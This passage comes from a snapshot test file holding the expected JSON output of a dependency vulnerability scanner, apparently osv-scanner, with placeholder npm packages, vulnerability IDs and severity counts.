"Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 1 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 1, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, 
"Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 1 }, "PackageTypeCount": { "Regular": 0, "Hidden": 1 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, 
"FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { 
"Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, 
"FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 1 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1", "GHSA-123" ], "Aliases": [ "GHSA-123" ], "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 1, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": 
{ "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 1 }, "PackageTypeCount": { "Regular": 0, "Hidden": 1 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1", "GHSA-123" ], "Aliases": [ "GHSA-123" ], "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "HIGH", "SeverityScore": "8.3" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 1, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { 
"AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 1, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 1, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1", "GHSA-123" ], "Aliases": [ "GHSA-123" ], "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, 
"Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "abc123", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, 
"Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "", "Commit": "abc123", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix 
available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, 
"Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.10.2-rc", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 
0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 2, "OS": 0, "Project": 2, "Hidden": 0 }, "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } } } --- [TestPrintOutputResults_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": 
[], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "5.9.0", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, 
"VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], 